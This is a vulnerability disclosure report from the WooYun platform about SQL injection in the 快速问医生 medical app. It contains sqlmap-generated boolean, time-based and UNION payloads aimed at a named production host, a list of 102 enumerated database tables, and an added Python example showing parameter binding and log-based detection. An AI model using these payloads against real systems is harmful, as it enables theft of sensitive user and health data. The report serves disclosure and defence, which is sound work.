
Vulnerability summary

Defect ID: wooyun-2015-0147180

Title: SQL injection in 快速问医生 (exposes a large volume of user data, including passwords)

Vendor: 快速问医生

Author: Hancock

Submitted: 2015-10-16 17:50

Fixed: 2015-12-03 08:38

Published: 2015-12-03 08:38

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:


Vulnerability details

Disclosure timeline:

2015-10-16: Details sent to the vendor, awaiting vendor action
2015-10-19: Vendor confirmed; details visible to the vendor only
2015-10-29: Details opened to core white hats and domain experts
2015-11-08: Details opened to regular white hats
2015-11-18: Details opened to intern white hats
2015-12-03: Details opened to the public

Summary:

An endpoint of 快速问医生 is vulnerable to SQL injection.

Detailed description:

Request captured from the app:

GET /v6/credit/user_level?userid=44738151&openid=oklWyjFW3Nx03Qsn%2FdrJvw%3D%3D&wechat_id=android&uuid=862620029971316 HTTP/1.1
Host: zys.iapp.120.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
X-Requested-With: com.ts.zys
User-Agent: android 4.1.1;862620029971316;zys 7.8.2;MI 2S zhjkyzYs safari webkit ;uname(18888888888);Mozilla/5.0 (Linux; U; Android 4.1.1; zh-cn; MI 2S Build/JRO03L) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN, en-US
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7


Injectable parameter: userid (sqlmap output follows)

---
Parameter: userid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: userid=44738151' AND 3676=3676 AND 'XFdT'='XFdT&openid=oklWyjFW3Nx03Qsn/drJvw==&wechat_id=android&uuid=862620029971316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: userid=44738151' AND (SELECT * FROM (SELECT(SLEEP(5)))tJxI) AND 'Yduf'='Yduf&openid=oklWyjFW3Nx03Qsn/drJvw==&wechat_id=android&uuid=862620029971316
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: userid=-3842' UNION ALL SELECT CONCAT(0x717a6a6a71,0x715751624d64506c4f67,0x71787a7871)-- &openid=oklWyjFW3Nx03Qsn/drJvw==&wechat_id=android&uuid=862620029971316
---
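The root cause behind all three sqlmap techniques above is the same: the userid value is spliced into the SQL text, so a single quote in the value changes the structure of the query. The following Python example is added here and is not code from the report or from the vendor. It uses an in-memory SQLite table as a stand-in for the MySQL backend (only the boolean-based tautology from the report is reused, because it is portable; SLEEP() and the hex CONCAT are MySQL-specific), hypothetical handler and table names, and constructed log lines. It shows the vulnerable concatenation beside the parameterised form, an allow-list check for userid, and a log scan that flags requests whose userid is not purely numeric.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the report's app_user database (hypothetical schema).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE mapp_user (userid INTEGER PRIMARY KEY, level INTEGER)")
    conn.executemany("INSERT INTO mapp_user VALUES (?, ?)", [(44738151, 3), (1, 7)])
    return conn

# Boolean-based tautology taken from the report's sqlmap output (URL-decoded).
BOOLEAN_PAYLOAD = "44738151' AND 3676=3676 AND 'XFdT'='XFdT"

def vulnerable_user_level(conn, userid):
    """Hypothetical 'before' handler: the raw parameter is spliced into the SQL
    text, so quotes inside the value become part of the query's structure."""
    sql = "SELECT level FROM mapp_user WHERE userid='" + userid + "'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def hardened_user_level(conn, userid):
    """Parameter binding: the value travels separately from the SQL text and is
    only ever compared as data, never parsed as SQL."""
    row = conn.execute(
        "SELECT level FROM mapp_user WHERE userid=?", (userid,)
    ).fetchone()
    return row[0] if row else None

# Allow-list for the parameter: a decimal user id and nothing else.
USERID_RE = re.compile(r"[0-9]{1,12}")

def is_valid_userid(raw):
    return USERID_RE.fullmatch(raw) is not None

def validate_userid(raw):
    """Edge validation: reject anything that is not a plain number before it
    reaches the database layer at all."""
    if not is_valid_userid(raw):
        raise ValueError("invalid userid")
    return int(raw)

# Constructed access-log request lines modelled on the request in the report.
LOG_LINES = [
    "GET /v6/credit/user_level?userid=44738151&wechat_id=android HTTP/1.1",
    "GET /v6/credit/user_level?userid=44738151'%20AND%203676%3D3676%20AND%20"
    "'XFdT'%3D'XFdT&wechat_id=android HTTP/1.1",
    "GET /v6/credit/user_level?userid=-3842'%20UNION%20ALL%20SELECT%20NULL--%20"
    "&wechat_id=android HTTP/1.1",
]

def suspicious_userids(lines):
    """Detection: return every userid value in the log that fails the allow-list."""
    hits = []
    for line in lines:
        parts = line.split(" ")
        if len(parts) < 2:
            continue
        query = urlsplit(parts[1]).query  # parse_qs percent-decodes the values
        for raw in parse_qs(query, keep_blank_values=True).get("userid", []):
            if not is_valid_userid(raw):
                hits.append(raw)
    return hits

if __name__ == "__main__":
    db = make_db()
    # The vulnerable handler evaluates the payload as SQL and still returns a row;
    # the hardened handler compares the whole string as data and finds nothing.
    print("vulnerable:", vulnerable_user_level(db, BOOLEAN_PAYLOAD))
    print("hardened:", hardened_user_level(db, BOOLEAN_PAYLOAD))
    print("flagged:", suspicious_userids(LOG_LINES))
```

Binding alone closes the injection; the allow-list is the second layer, and it is also what makes the log scan cheap: any userid that is not a number is worth an alert regardless of which injection technique it carries.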


Proof of vulnerability:

Database: app_user
[102 tables]
+-------------------------------+
| ask_mobile_user |
| hd_address |
| hd_prize |
| hd_user |
| jf_help |
| jf_item |
| jf_prize |
| jf_user |
| jf_user_address |
| jf_user_cost_detail |
| jf_user_cost_detail_1 |
| jf_user_cost_detail_201302 |
| jf_user_cost_detail_201303 |
| jf_user_cost_detail_201304 |
| jf_user_dynamic |
| jf_user_invite |
| jf_user_prize |
| jf_user_prize_address |
| mapp_collect_disease |
| mapp_collect_doctor |
| mapp_collect_question |
| mapp_doctor |
| mapp_doctor_group |
| mapp_pay |
| mapp_pay_list |
| mapp_pay_logs |
| mapp_pay_order_list |
| mapp_pay_record |
| mapp_uid_uuid_mapping |
| mapp_user |
| mapp_user_action_logs |
| mapp_user_active |
| mapp_user_ask_error |
| mapp_user_ask_normal |
| mapp_user_asknums |
| mapp_user_asknums_2012 |
| mapp_user_connect |
| mapp_user_err |
| mapp_user_ext |
| mapp_user_give_liuna |
| mapp_user_login_times |
| mapp_user_pay |
| mapp_user_score_save |
| mapp_user_uuid_relation |
| mapp_user_version |
| mapp_user_wxinfo |
| mapp_user_zhs_relation |
| mapp_userid_gtt |
| mapp_uuid_drivers |
| mapp_version_logs |
| mapp_version_user_logs_2012 |
| mapp_version_user_logs_201301 |
| mapp_version_user_logs_201302 |
| mapp_version_user_logs_201303 |
| mapp_version_user_logs_201304 |
| mapp_version_user_logs_201305 |
| mapp_version_user_logs_201306 |
| mapp_version_user_logs_201307 |
| mapp_version_user_logs_201308 |
| mapp_version_user_logs_201309 |
| mapp_version_user_logs_201310 |
| mapp_version_user_logs_201311 |
| mapp_version_user_logs_201312 |
| mapp_version_user_logs_201401 |
| mapp_version_user_logs_201402 |
| mapp_version_user_logs_201403 |
| mapp_version_user_logs_201404 |
| mapp_version_user_logs_201405 |
| mapp_version_user_logs_201406 |
| mapp_version_user_logs_201407 |
| mapp_version_user_logs_201408 |
| mapp_version_user_logs_201409 |
| mapp_version_user_logs_201410 |
| mapp_version_user_logs_201411 |
| mapp_version_user_logs_201412 |
| mapp_version_user_logs_201501 |
| mapp_version_user_logs_201502 |
| mapp_version_user_logs_201503 |
| mapp_version_user_logs_201504 |
| mapp_version_user_logs_201505 |
| mapp_version_user_logs_201506 |
| mapp_version_user_logs_201507 |
| mapp_version_user_logs_201508 |
| mapp_version_user_logs_201509 |
| mapp_version_user_logs_201510 |
| mapp_version_user_logs_201511 |
| mapp_version_user_logs_201512 |
| mapp_version_user_logs_201601 |
| mapp_version_user_logs_201602 |
| mapp_version_user_logs_201603 |
| syn_collect_disease |
| user_collect |
| user_exp_score_detail |
| user_sign |
| user_sign_log |
| wx_user_cj |
| wx_user_flag |
| wxuser_dis_class |
| wxuser_tags |
| zys_uuid_token |
| zys_uuid_uid |
| zys_wrong_token |
+-------------------------------+


More than 8 million users are affected.

(screenshot: 3.gif)

Fix recommendation:

Copyright notice: when reposting, credit the source as Hancock@WooYun


Responses

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-10-19 08:38

Vendor reply:

Vulnerability confirmed, thanks.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-10-16 18:12 | Hancock ( regular white hat | Rank:492 vulnerabilities:83 )

    Why add the part at the end of the title? It reflects badly on the vendor.

  2. 2015-10-16 18:15 | JGHOOluwa ( regular white hat | Rank:353 vulnerabilities:57 | just here to watch the experts go godlike ^-^ )

    @Hancock This vendor is very nice and polite~